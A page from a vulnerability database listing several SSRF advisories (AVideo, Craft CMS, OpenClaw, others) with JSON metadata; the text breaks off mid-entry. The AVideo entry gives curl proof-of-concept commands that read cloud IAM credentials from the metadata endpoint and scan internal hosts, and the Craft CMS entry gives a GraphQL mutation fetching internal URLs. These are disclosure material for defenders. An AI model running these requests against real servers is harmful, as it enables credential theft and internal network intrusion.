CWE-918
AllowedServer-Side Request Forgery (SSRF)
Abstraction: Base · Status: Incomplete
The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination.
4615 vulnerabilities reference this CWE, most recent first.
GHSA-WXJX-R2J2-96FX
Vulnerability from github – Published: 2026-03-25 19:53 – Updated: 2026-03-25 19:53Summary
The plugin/Live/test.php endpoint accepts a URL via the statsURL parameter and fetches it server-side using file_get_contents(), curl_exec(), or wget, returning the full response content in the HTML output. The only validation is a trivial regex (/^http/) that does not block requests to internal/private IP ranges or cloud metadata endpoints. The codebase provides isSSRFSafeURL() which blocks private IPs and resolves DNS to prevent rebinding, but this endpoint does not call it. An authenticated admin can read responses from cloud metadata services, internal network services, and localhost endpoints.
Details
The vulnerable code path is in plugin/Live/test.php:
User input (line 11):
$statsURL = $_REQUEST['statsURL'];
if (empty($statsURL) || $statsURL == "php://input" || !preg_match("/^http/", $statsURL)) {
_log('this is not a URL ');
exit;
}
The regex /^http/ only verifies the URL starts with "http" — it does not validate the host, resolve DNS, or check against private/reserved IP ranges.
Sink — file_get_contents (line 58-68):
if (ini_get('allow_url_fopen')) {
try {
$tmp = file_get_contents($url, false, $context);
_log('file_get_contents:: '.htmlentities($tmp));
Sink — curl_exec (line 73-94):
} elseif (function_exists('curl_init')) {
$ch = curl_init();
// ...
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
// ...
$output = curl_exec($ch);
// ...
_log('curl_init:: '.htmlentities($output));
Sink — wget (line 114):
if (wget($url, $filename)) {
$result = file_get_contents($filename);
_log('wget:: '.htmlentities($result));
All three code paths output the full response content to the user via _log(), which echoes to the HTML response (line 155-160).
The codebase provides isSSRFSafeURL() at objects/functions.php:4025 which validates URL scheme, resolves DNS hostnames to IP addresses, and blocks private/reserved IP ranges (127.0.0.0/8, 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16, 169.254.0.0/16, and IPv6 equivalents). This function is used in 7 other endpoints including the previously-reported objects/aVideoEncoder.json.php, but plugin/Live/test.php does not call it.
Additionally, SSL certificate verification is disabled on both the file_get_contents stream context (lines 45-49) and the curl handler (lines 79-80), allowing MITM attacks against HTTPS targets.
The endpoint also lacks CSRF token validation while accepting GET requests via $_REQUEST, making it susceptible to cross-site request forgery against authenticated admins, although the CSRF-triggered variant is blind (attacker cannot read the response cross-origin).
PoC
Step 1: Authenticate as admin and obtain session cookie
# Login to obtain PHPSESSID
PHPSESSID=$(curl -s -c - 'https://target.com/objects/userLogin.json.php' \
-d 'user=admin&pass=adminpass' | grep PHPSESSID | awk '{print $7}')
Step 2: Read AWS cloud metadata (IAM credentials)
curl -b "PHPSESSID=${PHPSESSID}" \
'https://target.com/plugin/Live/test.php?statsURL=http://169.254.169.254/latest/meta-data/iam/security-credentials/'
Expected output: HTML page containing the full cloud metadata response including IAM role names.
Step 3: Read IAM credentials for a specific role
curl -b "PHPSESSID=${PHPSESSID}" \
'https://target.com/plugin/Live/test.php?statsURL=http://169.254.169.254/latest/meta-data/iam/security-credentials/MyRole'
Expected output: JSON containing AccessKeyId, SecretAccessKey, and Token for the IAM role.
Step 4: Scan internal services
curl -b "PHPSESSID=${PHPSESSID}" \
'https://target.com/plugin/Live/test.php?statsURL=http://192.168.1.1:8080/'
Expected output: Full response from internal service at 192.168.1.1:8080.
Impact
An authenticated admin can:
- Read cloud metadata credentials: Access AWS/GCP/Azure instance metadata endpoints (169.254.169.254) to retrieve IAM credentials, instance identity tokens, and other sensitive cloud configuration.
- Enumerate internal services: Probe internal network ranges (10.x, 172.16.x, 192.168.x) and localhost services to discover and read from services not exposed to the internet.
- Port scan internal infrastructure: Determine which internal hosts and ports are active based on response timing and content.
- Bypass network segmentation: Reach services behind firewalls that trust the AVideo server's IP address.
The full response disclosure (not blind) makes this a high-confidentiality-impact finding. The admin authentication requirement limits the attack surface but does not eliminate it — compromised admin accounts, insider threats, and the lack of CSRF protection all provide attack vectors.
Recommended Fix
Add isSSRFSafeURL() validation before fetching the URL. In plugin/Live/test.php, after line 15:
$statsURL = $_REQUEST['statsURL'];
if (empty($statsURL) || $statsURL == "php://input" || !preg_match("/^http/", $statsURL)) {
_log('this is not a URL ');
exit;
}
// Add SSRF protection
if (!isSSRFSafeURL($statsURL)) {
_log('URL failed SSRF safety check: ' . htmlentities($statsURL));
exit;
}
Additionally, enable SSL verification in the curl handler (lines 79-80):
// Replace:
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
// With:
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, true);
And in the stream context (lines 45-49):
// Replace:
"ssl" => [
"verify_peer" => false,
"verify_peer_name" => false,
"allow_self_signed" => true,
],
// With:
"ssl" => [
"verify_peer" => true,
"verify_peer_name" => true,
"allow_self_signed" => false,
],
{
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "wwbn/avideo"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "26.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-25T19:53:55Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
"details": "## Summary\n\nThe `plugin/Live/test.php` endpoint accepts a URL via the `statsURL` parameter and fetches it server-side using `file_get_contents()`, `curl_exec()`, or `wget`, returning the full response content in the HTML output. The only validation is a trivial regex (`/^http/`) that does not block requests to internal/private IP ranges or cloud metadata endpoints. The codebase provides `isSSRFSafeURL()` which blocks private IPs and resolves DNS to prevent rebinding, but this endpoint does not call it. An authenticated admin can read responses from cloud metadata services, internal network services, and localhost endpoints.\n\n## Details\n\nThe vulnerable code path is in `plugin/Live/test.php`:\n\n**User input (line 11):**\n```php\n$statsURL = $_REQUEST[\u0027statsURL\u0027];\nif (empty($statsURL) || $statsURL == \"php://input\" || !preg_match(\"/^http/\", $statsURL)) {\n _log(\u0027this is not a URL \u0027);\n exit;\n}\n```\n\nThe regex `/^http/` only verifies the URL starts with \"http\" \u2014 it does not validate the host, resolve DNS, or check against private/reserved IP ranges.\n\n**Sink \u2014 file_get_contents (line 58-68):**\n```php\nif (ini_get(\u0027allow_url_fopen\u0027)) {\n try {\n $tmp = file_get_contents($url, false, $context);\n _log(\u0027file_get_contents:: \u0027.htmlentities($tmp));\n```\n\n**Sink \u2014 curl_exec (line 73-94):**\n```php\n} elseif (function_exists(\u0027curl_init\u0027)) {\n $ch = curl_init();\n // ...\n curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);\n curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);\n // ...\n $output = curl_exec($ch);\n // ...\n _log(\u0027curl_init:: \u0027.htmlentities($output));\n```\n\n**Sink \u2014 wget (line 114):**\n```php\nif (wget($url, $filename)) {\n $result = file_get_contents($filename);\n _log(\u0027wget:: \u0027.htmlentities($result));\n```\n\nAll three code paths output the full response content to the user via `_log()`, which echoes to the HTML response (line 155-160).\n\nThe codebase provides `isSSRFSafeURL()` at `objects/functions.php:4025` which validates URL scheme, resolves DNS hostnames to IP addresses, and blocks private/reserved IP ranges (127.0.0.0/8, 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16, 169.254.0.0/16, and IPv6 equivalents). This function is used in 7 other endpoints including the previously-reported `objects/aVideoEncoder.json.php`, but `plugin/Live/test.php` does not call it.\n\nAdditionally, SSL certificate verification is disabled on both the `file_get_contents` stream context (lines 45-49) and the curl handler (lines 79-80), allowing MITM attacks against HTTPS targets.\n\nThe endpoint also lacks CSRF token validation while accepting GET requests via `$_REQUEST`, making it susceptible to cross-site request forgery against authenticated admins, although the CSRF-triggered variant is blind (attacker cannot read the response cross-origin).\n\n## PoC\n\n**Step 1: Authenticate as admin and obtain session cookie**\n```bash\n# Login to obtain PHPSESSID\nPHPSESSID=$(curl -s -c - \u0027https://target.com/objects/userLogin.json.php\u0027 \\\n -d \u0027user=admin\u0026pass=adminpass\u0027 | grep PHPSESSID | awk \u0027{print $7}\u0027)\n```\n\n**Step 2: Read AWS cloud metadata (IAM credentials)**\n```bash\ncurl -b \"PHPSESSID=${PHPSESSID}\" \\\n \u0027https://target.com/plugin/Live/test.php?statsURL=http://169.254.169.254/latest/meta-data/iam/security-credentials/\u0027\n```\n\nExpected output: HTML page containing the full cloud metadata response including IAM role names.\n\n**Step 3: Read IAM credentials for a specific role**\n```bash\ncurl -b \"PHPSESSID=${PHPSESSID}\" \\\n \u0027https://target.com/plugin/Live/test.php?statsURL=http://169.254.169.254/latest/meta-data/iam/security-credentials/MyRole\u0027\n```\n\nExpected output: JSON containing `AccessKeyId`, `SecretAccessKey`, and `Token` for the IAM role.\n\n**Step 4: Scan internal services**\n```bash\ncurl -b \"PHPSESSID=${PHPSESSID}\" \\\n \u0027https://target.com/plugin/Live/test.php?statsURL=http://192.168.1.1:8080/\u0027\n```\n\nExpected output: Full response from internal service at 192.168.1.1:8080.\n\n## Impact\n\nAn authenticated admin can:\n\n- **Read cloud metadata credentials:** Access AWS/GCP/Azure instance metadata endpoints (169.254.169.254) to retrieve IAM credentials, instance identity tokens, and other sensitive cloud configuration.\n- **Enumerate internal services:** Probe internal network ranges (10.x, 172.16.x, 192.168.x) and localhost services to discover and read from services not exposed to the internet.\n- **Port scan internal infrastructure:** Determine which internal hosts and ports are active based on response timing and content.\n- **Bypass network segmentation:** Reach services behind firewalls that trust the AVideo server\u0027s IP address.\n\nThe full response disclosure (not blind) makes this a high-confidentiality-impact finding. The admin authentication requirement limits the attack surface but does not eliminate it \u2014 compromised admin accounts, insider threats, and the lack of CSRF protection all provide attack vectors.\n\n## Recommended Fix\n\nAdd `isSSRFSafeURL()` validation before fetching the URL. In `plugin/Live/test.php`, after line 15:\n\n```php\n$statsURL = $_REQUEST[\u0027statsURL\u0027];\nif (empty($statsURL) || $statsURL == \"php://input\" || !preg_match(\"/^http/\", $statsURL)) {\n _log(\u0027this is not a URL \u0027);\n exit;\n}\n\n// Add SSRF protection\nif (!isSSRFSafeURL($statsURL)) {\n _log(\u0027URL failed SSRF safety check: \u0027 . htmlentities($statsURL));\n exit;\n}\n```\n\nAdditionally, enable SSL verification in the curl handler (lines 79-80):\n\n```php\n// Replace:\ncurl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);\ncurl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);\n// With:\ncurl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2);\ncurl_setopt($ch, CURLOPT_SSL_VERIFYPEER, true);\n```\n\nAnd in the stream context (lines 45-49):\n\n```php\n// Replace:\n\"ssl\" =\u003e [\n \"verify_peer\" =\u003e false,\n \"verify_peer_name\" =\u003e false,\n \"allow_self_signed\" =\u003e true,\n],\n// With:\n\"ssl\" =\u003e [\n \"verify_peer\" =\u003e true,\n \"verify_peer_name\" =\u003e true,\n \"allow_self_signed\" =\u003e false,\n],\n```",
"id": "GHSA-wxjx-r2j2-96fx",
"modified": "2026-03-25T19:53:55Z",
"published": "2026-03-25T19:53:55Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-wxjx-r2j2-96fx"
},
{
"type": "WEB",
"url": "https://github.com/WWBN/AVideo/commit/c95eafbdfccd5959c546a430c32fb3b6026f39ac"
},
{
"type": "PACKAGE",
"url": "https://github.com/WWBN/AVideo"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "AVideo: Full-Read SSRF Through Unvalidated statsURL Parameter in plugin/Live/test.php"
}
GHSA-WXPM-572G-X86C
Vulnerability from github – Published: 2024-10-17 18:31 – Updated: 2026-04-01 18:32Server-Side Request Forgery (SSRF) vulnerability in WisdmLabs Edwiser Bridge.This issue affects Edwiser Bridge: from n/a through 3.0.7.
{
"affected": [],
"aliases": [
"CVE-2024-49312"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-10-17T18:15:14Z",
"severity": "MODERATE"
},
"details": "Server-Side Request Forgery (SSRF) vulnerability in WisdmLabs Edwiser Bridge.This issue affects Edwiser Bridge: from n/a through 3.0.7.",
"id": "GHSA-wxpm-572g-x86c",
"modified": "2026-04-01T18:32:03Z",
"published": "2024-10-17T18:31:37Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-49312"
},
{
"type": "WEB",
"url": "https://patchstack.com/database/Wordpress/Plugin/edwiser-bridge/vulnerability/wordpress-edwiser-bridge-plugin-3-0-7-server-side-request-forgery-ssrf-vulnerability?_s_id=cve"
},
{
"type": "WEB",
"url": "https://patchstack.com/database/vulnerability/edwiser-bridge/wordpress-edwiser-bridge-plugin-3-0-7-server-side-request-forgery-ssrf-vulnerability?_s_id=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-WXQ5-CQJ8-P4VX
Vulnerability from github – Published: 2025-07-25 06:30 – Updated: 2025-07-25 06:30A vulnerability classified as critical has been found in yanyutao0402 ChanCMS up to 3.1.2. This affects the function getArticle of the file app/modules/api/service/gather.js. The manipulation of the argument targetUrl leads to server-side request forgery. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 3.1.3 is able to address this issue. The identifier of the patch is 3ef58a50e8b3c427b03c8cf3c9e19a79aa809be6. It is recommended to upgrade the affected component.
{
"affected": [],
"aliases": [
"CVE-2025-8133"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-07-25T06:15:24Z",
"severity": "MODERATE"
},
"details": "A vulnerability classified as critical has been found in yanyutao0402 ChanCMS up to 3.1.2. This affects the function getArticle of the file app/modules/api/service/gather.js. The manipulation of the argument targetUrl leads to server-side request forgery. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 3.1.3 is able to address this issue. The identifier of the patch is 3ef58a50e8b3c427b03c8cf3c9e19a79aa809be6. It is recommended to upgrade the affected component.",
"id": "GHSA-wxq5-cqj8-p4vx",
"modified": "2025-07-25T06:30:31Z",
"published": "2025-07-25T06:30:31Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8133"
},
{
"type": "WEB",
"url": "https://gitee.com/yanyutao0402/ChanCMS/commit/3ef58a50e8b3c427b03c8cf3c9e19a79aa809be6"
},
{
"type": "WEB",
"url": "https://gitee.com/yanyutao0402/ChanCMS/issues/ICLP1K"
},
{
"type": "WEB",
"url": "https://gitee.com/yanyutao0402/ChanCMS/releases/tag/V3.1.3"
},
{
"type": "WEB",
"url": "https://vuldb.com/?ctiid.317529"
},
{
"type": "WEB",
"url": "https://vuldb.com/?id.317529"
},
{
"type": "WEB",
"url": "https://vuldb.com/?submit.619777"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-X22M-J5QQ-J49M
Vulnerability from github – Published: 2026-02-18 17:45 – Updated: 2026-03-11 20:41Summary
The Feishu extension could fetch attacker-controlled remote URLs in two paths without SSRF protections:
sendMediaFeishu(mediaUrl)- Feishu DocX markdown image URLs (write/append -> image processing)
Affected versions
< 2026.2.14
Patched versions
>= 2026.2.14
Impact
If an attacker can influence tool calls (directly or via prompt injection), they may be able to trigger requests to internal services and re-upload the response as Feishu media.
Remediation
Upgrade to OpenClaw 2026.2.14 or newer.
Notes
The fix routes Feishu remote media fetching through hardened runtime helpers that enforce SSRF policies and size limits.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "openclaw"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2026.2.14"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-28451"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": true,
"github_reviewed_at": "2026-02-18T17:45:12Z",
"nvd_published_at": "2026-03-05T22:16:17Z",
"severity": "HIGH"
},
"details": "### Summary\nThe Feishu extension could fetch attacker-controlled remote URLs in two paths without SSRF protections:\n\n- `sendMediaFeishu(mediaUrl)`\n- Feishu DocX markdown image URLs (write/append -\u003e image processing)\n\n### Affected versions\n- `\u003c 2026.2.14`\n\n### Patched versions\n- `\u003e= 2026.2.14`\n\n### Impact\nIf an attacker can influence tool calls (directly or via prompt injection), they may be able to trigger requests to internal services and re-upload the response as Feishu media.\n\n### Remediation\nUpgrade to OpenClaw `2026.2.14` or newer.\n\n### Notes\nThe fix routes Feishu remote media fetching through hardened runtime helpers that enforce SSRF policies and size limits.",
"id": "GHSA-x22m-j5qq-j49m",
"modified": "2026-03-11T20:41:53Z",
"published": "2026-02-18T17:45:12Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-x22m-j5qq-j49m"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28451"
},
{
"type": "WEB",
"url": "https://github.com/openclaw/openclaw/pull/16285"
},
{
"type": "WEB",
"url": "https://github.com/openclaw/openclaw/commit/5b4121d6011a48c71e747e3c18197f180b872c5d"
},
{
"type": "PACKAGE",
"url": "https://github.com/openclaw/openclaw"
},
{
"type": "WEB",
"url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.14"
},
{
"type": "WEB",
"url": "https://www.vulncheck.com/advisories/openclaw-ssrf-via-feishu-extension-media-fetching"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "OpenClaw has two SSRF via sendMediaFeishu and markdown image fetching in Feishu extension"
}
GHSA-X245-WV5C-HR8Q
Vulnerability from github – Published: 2024-04-17 15:30 – Updated: 2026-04-08 18:32The RSS Aggregator by Feedzy – Feed to Post, Autoblogging, News & YouTube Video Feeds Aggregator plugin for WordPress is vulnerable to Blind Server-Side Request Forgery in all versions up to, and including, 4.4.7 via the fetch_feed functionality. This makes it possible for authenticated attackers, with contributor access and above, to make web requests to arbitrary locations originating from the web application and can be used to modify information from internal services. NOTE: This vulnerability, exploitable by contributor-level users, was was fixed in version 4.4.7. The same vulnerability was fixed for author-level users in version 4.4.8.
{
"affected": [],
"aliases": [
"CVE-2023-6805"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-04-17T13:15:08Z",
"severity": "MODERATE"
},
"details": "The RSS Aggregator by Feedzy \u2013 Feed to Post, Autoblogging, News \u0026 YouTube Video Feeds Aggregator plugin for WordPress is vulnerable to Blind Server-Side Request Forgery in all versions up to, and including, 4.4.7 via the fetch_feed functionality. This makes it possible for authenticated attackers, with contributor access and above, to make web requests to arbitrary locations originating from the web application and can be used to modify information from internal services. NOTE: This vulnerability, exploitable by contributor-level users, was was fixed in version 4.4.7. The same vulnerability was fixed for author-level users in version 4.4.8.",
"id": "GHSA-x245-wv5c-hr8q",
"modified": "2026-04-08T18:32:59Z",
"published": "2024-04-17T15:30:42Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6805"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/changeset/3070624/feedzy-rss-feeds"
},
{
"type": "WEB",
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/46978e1d-7adb-49f6-8e41-093f177c9a4d?source=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-X27P-WFQW-HFCC
Vulnerability from github – Published: 2026-01-05 18:02 – Updated: 2026-01-06 15:52The Craft CMS GraphQL save_<VolumeName>_Asset mutation is vulnerable to Server-Side Request Forgery (SSRF). This vulnerability arises because the _file input, specifically its url parameter, allows the server to fetch content from arbitrary remote locations without proper validation. Attackers can exploit this by providing internal IP addresses or cloud metadata endpoints as the url, forcing the server to make requests to these restricted services. The fetched content is then saved as an asset, which can subsequently be accessed and exfiltrated, leading to potential data exposure and infrastructure compromise. This exploitation requires specific GraphQL permissions for asset management within the targeted volume.
Users should update to the patched 5.8.21 and 4.16.17 releases to mitigate the issue.
References:
https://github.com/craftcms/cms/commit/013db636fdb38f3ce5657fd196b6d952f98ebc52
https://github.com/craftcms/cms/blob/5.x/CHANGELOG.md#5821---2025-12-04
Required Permissions
The exploitation requires a few permissions to be enabled in the used GraphQL schema:
- "Edit assets in the <VolumeName> volume"
- "Create assets in the <VolumeName> volume"
Steps to Reproduce
-
Log in to the Craft CMS control panel as an admin.
-
Create a new volume if you haven’t yet.
-
Create a new schema (or use the full/public schema) and enable the permissions mentioned above in the Required Permissions section.
-
Go to GraphiQL:
http://craft.local/admin/graphiql& set the created schema. -
Run the following GraphQL mutation to upload an Asset (Replace the
<VolumeName>with your volume name):
mutation {
save_<VolumeName>_Asset(_file: {
url: "http://127.0.0.1:80/index.php"
filename: "poc.txt"
}) {
id
}
}
-
Note that the
index.phpresponse will be saved aspoc.txt& its content will be accessible via the asset preview/download functionality. -
For the PoC,
http://127.0.0.1:80/index.phpwas used as an example. However, theurlparameter can be leveraged to target internal services, cloud metadata endpoints, or any arbitrary external URL.
Impact
Successful exploitation of this SSRF vulnerability allows attackers to access internal network resources, bypass firewall rules, and conduct network reconnaissance.
In cloud environments (AWS, GCP, Azure), this can lead to the theft of sensitive credentials (e.g., IAM roles, service account tokens) from metadata endpoints, potentially resulting in the full compromise of the underlying infrastructure and the exfiltration of sensitive data.
Users should update to the patched versions (5.8.21 and 4.16.17) to mitigate the issue.
Users running Craft 3.5.0+ should update to the latest Craft 4.16.17 or 5.8.21 releases.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 5.8.20"
},
"package": {
"ecosystem": "Packagist",
"name": "craftcms/cms"
},
"ranges": [
{
"events": [
{
"introduced": "5.0.0-RC1"
},
{
"fixed": "5.8.21"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 4.16.16"
},
"package": {
"ecosystem": "Packagist",
"name": "craftcms/cms"
},
"ranges": [
{
"events": [
{
"introduced": "3.5.0"
},
{
"fixed": "4.16.17"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-68437"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": true,
"github_reviewed_at": "2026-01-05T18:02:37Z",
"nvd_published_at": "2026-01-05T22:15:52Z",
"severity": "MODERATE"
},
"details": "The Craft CMS GraphQL `save_\u003cVolumeName\u003e_Asset` mutation is vulnerable to Server-Side Request Forgery (SSRF). This vulnerability arises because the `_file` input, specifically its `url` parameter, allows the server to fetch content from arbitrary remote locations without proper validation. Attackers can exploit this by providing internal IP addresses or cloud metadata endpoints as the `url`, forcing the server to make requests to these restricted services. The fetched content is then saved as an asset, which can subsequently be accessed and exfiltrated, leading to potential data exposure and infrastructure compromise. This exploitation requires specific GraphQL permissions for asset management within the targeted volume.\n\nUsers should update to the patched 5.8.21 and 4.16.17 releases to mitigate the issue.\n\nReferences:\n\nhttps://github.com/craftcms/cms/commit/013db636fdb38f3ce5657fd196b6d952f98ebc52\n\nhttps://github.com/craftcms/cms/blob/5.x/CHANGELOG.md#5821---2025-12-04\n\n---\n\n### Required Permissions\n\nThe exploitation requires a few permissions to be enabled in the used GraphQL schema:\n- \"Edit assets in the `\u003cVolumeName\u003e` volume\"\n- \"Create assets in the `\u003cVolumeName\u003e` volume\"\n\n### Steps to Reproduce\n\n1. Log in to the Craft CMS control panel as an admin.\n\n2. Create a new volume if you haven\u2019t yet.\n\n3. Create a new schema (or use the full/public schema) and enable the permissions mentioned above in the **Required Permissions** section.\n\n4. Go to **GraphiQL**: `http://craft.local/admin/graphiql` \u0026 set the created schema.\n\n5. Run the following GraphQL mutation to upload an Asset *(Replace the `\u003cVolumeName\u003e` with your volume name)*:\n\n```graphql\nmutation {\n save_\u003cVolumeName\u003e_Asset(_file: { \n url: \"http://127.0.0.1:80/index.php\"\n filename: \"poc.txt\"\n }) {\n id\n }\n}\n```\n\n6. Note that the `index.php` response will be saved as `poc.txt` \u0026 its content will be accessible via the asset preview/download functionality.\n\n8. For the PoC, `http://127.0.0.1:80/index.php` was used as an example. However, the `url` parameter can be leveraged to target internal services, cloud metadata endpoints, or any arbitrary external URL.\n\n## Impact\n\nSuccessful exploitation of this SSRF vulnerability allows attackers to access internal network resources, bypass firewall rules, and conduct network reconnaissance.\n\nIn cloud environments (AWS, GCP, Azure), this can lead to the theft of sensitive credentials (e.g., IAM roles, service account tokens) from metadata endpoints, potentially resulting in the full compromise of the underlying infrastructure and the exfiltration of sensitive data.\n\n---\n\nUsers should update to the patched versions (5.8.21 and 4.16.17) to mitigate the issue.\n\nUsers running Craft 3.5.0+ should update to the latest Craft 4.16.17 or 5.8.21 releases.",
"id": "GHSA-x27p-wfqw-hfcc",
"modified": "2026-01-06T15:52:11Z",
"published": "2026-01-05T18:02:37Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/craftcms/cms/security/advisories/GHSA-x27p-wfqw-hfcc"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68437"
},
{
"type": "WEB",
"url": "https://github.com/craftcms/cms/commit/013db636fdb38f3ce5657fd196b6d952f98ebc52"
},
{
"type": "PACKAGE",
"url": "https://github.com/craftcms/cms"
},
{
"type": "WEB",
"url": "https://github.com/craftcms/cms/blob/5.x/CHANGELOG.md#5821---2025-12-04"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P",
"type": "CVSS_V4"
}
],
"summary": "Craft CMS vulnerable to Server-Side Request Forgery (SSRF) via GraphQL Asset Upload Mutation"
}
GHSA-X27V-X225-GQ8G
Vulnerability from github – Published: 2017-12-06 16:43 – Updated: 2023-08-29 15:38The Recurly Client Ruby Library before 2.0.13, 2.1.11, 2.2.5, 2.3.10, 2.4.11, 2.5.4, 2.6.3, 2.7.8, 2.8.2, 2.9.2, 2.10.4, 2.11.3 is vulnerable to a Server-Side Request Forgery vulnerability in the Resource#find method that could result in compromise of API keys or other critical resources.
{
"affected": [
{
"package": {
"ecosystem": "RubyGems",
"name": "recurly"
},
"ranges": [
{
"events": [
{
"introduced": "2.3.0"
},
{
"fixed": "2.3.10"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "RubyGems",
"name": "recurly"
},
"ranges": [
{
"events": [
{
"introduced": "2.2.0"
},
{
"fixed": "2.2.5"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "RubyGems",
"name": "recurly"
},
"ranges": [
{
"events": [
{
"introduced": "2.1.0"
},
{
"fixed": "2.1.11"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "RubyGems",
"name": "recurly"
},
"ranges": [
{
"events": [
{
"introduced": "2.0.0"
},
{
"fixed": "2.0.13"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "RubyGems",
"name": "recurly"
},
"ranges": [
{
"events": [
{
"introduced": "2.9.0"
},
{
"fixed": "2.9.2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "RubyGems",
"name": "recurly"
},
"ranges": [
{
"events": [
{
"introduced": "2.8.0"
},
{
"fixed": "2.8.2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "RubyGems",
"name": "recurly"
},
"ranges": [
{
"events": [
{
"introduced": "2.7.0"
},
{
"fixed": "2.7.8"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "RubyGems",
"name": "recurly"
},
"ranges": [
{
"events": [
{
"introduced": "2.6.0"
},
{
"fixed": "2.6.3"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "RubyGems",
"name": "recurly"
},
"ranges": [
{
"events": [
{
"introduced": "2.5.0"
},
{
"fixed": "2.5.4"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "RubyGems",
"name": "recurly"
},
"ranges": [
{
"events": [
{
"introduced": "2.4.0"
},
{
"fixed": "2.4.11"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "RubyGems",
"name": "recurly"
},
"ranges": [
{
"events": [
{
"introduced": "2.11.0"
},
{
"fixed": "2.11.3"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "RubyGems",
"name": "recurly"
},
"ranges": [
{
